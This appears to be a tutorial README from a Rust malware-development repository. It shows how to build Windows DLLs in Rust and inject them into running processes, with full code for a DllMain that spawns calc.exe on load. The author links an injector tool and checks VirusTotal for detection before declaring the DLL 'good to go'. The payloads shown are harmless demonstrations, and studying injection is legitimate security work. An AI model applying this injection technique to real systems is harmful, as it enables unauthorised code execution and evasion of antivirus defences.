Rust-for-Malware-Development

DLL INJECTION USING RUST

Intro

Hello nerds. So today we are going to see How you can write your own dll on various methods and perform dll injection using Rust.


Note ::> This is not an complete tutorial of teching how they works underneath but an actual implemeting methods to create your own custom dll’s and perform DLL injection. Feel Free to google if you got stuck


Creating DLL Files.

create an new –lib crate and add the following [lib] to your cargo.toml file to compile the following code into dll’s.

[lib]
crate-type = ["cdylib"]

Lets write this following sample program and compile it !

use std::{ffi::CString, ptr::null_mut};
use winapi::um::winuser::{MessageBoxA, MB_OK};

#[unsafe(no_mangle)]
pub extern "stdcall" fn msg_frm_vx(){
    let msg = CString::new("Malware resources needs to be free and wide").expect("Failed");
    let cap = CString::new("Message From Vx-Underground").expect("Error cap");
    unsafe{
        MessageBoxA(null_mut(), msg.as_ptr(), cap.as_ptr(), MB_OK);
    }
}

// stdcall in C
#[unsafe(no_mangle)]
pub extern "system" fn msg_frm_smukx(){
    let msg = CString::new("Custom DLL's are always Cool. Bye").expect("Failed");
    let cap = CString::new("Message From SMukx").expect("Error cap");
    unsafe{
        MessageBoxA(null_mut(), msg.as_ptr(), cap.as_ptr(), MB_OK);
    }
}

The raw code are posted in this repo. Feel free to check them out !

Above code here : Code

Short Basics:

Why we use no_mangle on functions

Ok but for what shit do i need to use it ?


alt text

hook.dll file compiled in release folder.

lets go there and call the function using rundll32.exe dllpath,func_name

alt text

Woah… it works. so this is how dll works haa ..

ok so lets get into action and write an injector to inject dll into processes .

DLL Injector - Rust

Many Hours Later…


I have written a Rust Injector that supports multiple injection methods and process targeting by name, making it suitable for advanced users and developers exploring process manipulation.

DLL Injector Tool: Injector

Injector Code can be found here: Code

Lets try to inject it !!

alt text

alt text

Yes we have successfully injected our DLL .. But wait till now we saw how we can implement multiple functions and MessageBoxes. So what about some Program executions !!

lets wrtie something interesing. Lets write an dll that opens actual Applications !

The game begins …

Lets write an Simple dll that opens calc.exe using CreateProcessA WinAPI func.

use std::ffi::CString;
use std::ptr::{null, null_mut};
use winapi::shared::minwindef::{BOOL, DWORD, HMODULE};
use winapi::um::handleapi::CloseHandle;
use winapi::um::libloaderapi::FreeLibraryAndExitThread;
use winapi::um::processthreadsapi::{
    CreateProcessA, CreateThread, PROCESS_INFORMATION, STARTUPINFOA,
};
use winapi::um::synchapi::WaitForSingleObject;
use winapi::um::winbase::{CREATE_NEW_CONSOLE, INFINITE};
use winapi::um::winnt::PVOID;

struct ThreadData {
    h_process: PVOID,
    h_thread: PVOID,
    h_module: HMODULE,
}

extern "system" fn thread_proc(lp_param: PVOID) -> DWORD {
    let data = lp_param as *mut ThreadData;
    let process_info = unsafe {&*data};
    unsafe {
        WaitForSingleObject(process_info.h_process, INFINITE);
        CloseHandle(process_info.h_process);
        CloseHandle(process_info.h_thread);
        FreeLibraryAndExitThread(process_info.h_module, 0);
    }
    0 // This line won't actually be reached due to FreeLibraryAndExitThread
}

#[unsafe(no_mangle)]
pub extern "stdcall" fn DllMain(
    h_module: HMODULE,
    dw_reason: DWORD,
    _lp_reserved: *mut std::ffi::c_void,
) -> BOOL {
    match dw_reason {
        1 => {
            // DLL_PROCESS_ATTACH
            unsafe {
                let mut startup_info: STARTUPINFOA = std::mem::zeroed();
                startup_info.cb = std::mem::size_of::<STARTUPINFOA>() as u32;

                let mut process_info: PROCESS_INFORMATION = std::mem::zeroed();

                let application_name = match CString::new("C:\\Windows\\System32\\calc.exe") {
                    Ok(cstr) => cstr,
                    Err(_) => return 0,
                };

                let success = CreateProcessA(
                    null(),
                    application_name.as_ptr() as *mut i8,
                    null_mut(),
                    null_mut(),
                    0,
                    CREATE_NEW_CONSOLE,
                    null_mut(),
                    null(),
                    &mut startup_info,
                    &mut process_info,
                );

                if success == 0 {
                    return 0;
                }
            
                let thread_data = Box::into_raw(Box::new(ThreadData {
                    h_process: process_info.hProcess,
                    h_thread: process_info.hThread,
                    h_module,
                }));


                let thread_handle = CreateThread(
                    null_mut(),
                    0,                    
                    Some(thread_proc),   
                    thread_data as PVOID, 
                    0,                   
                    null_mut(),          
                );

                if thread_handle.is_null() {
                    CloseHandle(process_info.hProcess);
                    CloseHandle(process_info.hThread);
                    let _ = Box::from_raw(thread_data);
                    return 0;
                }

                CloseHandle(thread_handle);
                1
            }
        }
        0 => 1, // DLL_PROCESS_DETACH
        _ => 1,
    }
}

Calc.exe code can be found Here : Code

Lets compile and see if its works !

alt text

It works but i made a mistakes. when you run this dll . the calculator opens up multiple times becasue i didnt close handle for the Process . so lets rewrite the hook.dll that opens the calc.exe

When i tried to fix it guess what! i fuc*ed it up :()

Insted of fixing it , I buffed that error . It executes 2 calc at the time : .

alt text

And some hours later …


alt text

Yayy.. I Fixed it !! + Found one Golden Gem


How i Fixed it ?

First i Closed the handle using CloseHandle and WaitForSignalObject API’s But i dont know why it does’nt works!

So to properly handle the dll’s. I used some events such as ATTACH and DETACH and by the process i Closed its threads and processes.

The Golden Gem or Bug ?

So when i execute my dll. i closed my notepad but noticed that still my notepad is running on the same PID !

I Tried to restart my Process Hacker but the notepad.exe is showing buy i already closed it .

when i detach my calc.exe manually , the process automatically closes it . Hmm thats interesting .. let me research more about it ;)

Fixed calc.exe code can be found here fixed_calc_dll.rs

Thats it nerds .. now you can create and rock your own custom dll and exec any shit using Rust !

I Tried to check if i get any red flags on my dll file on virustotal!

Looks like we are good to go !

Thanks and about

Follow me at Twitter: 5mukx

REFLECTIVE DLL ?! On the Way !..

Credits and Resources :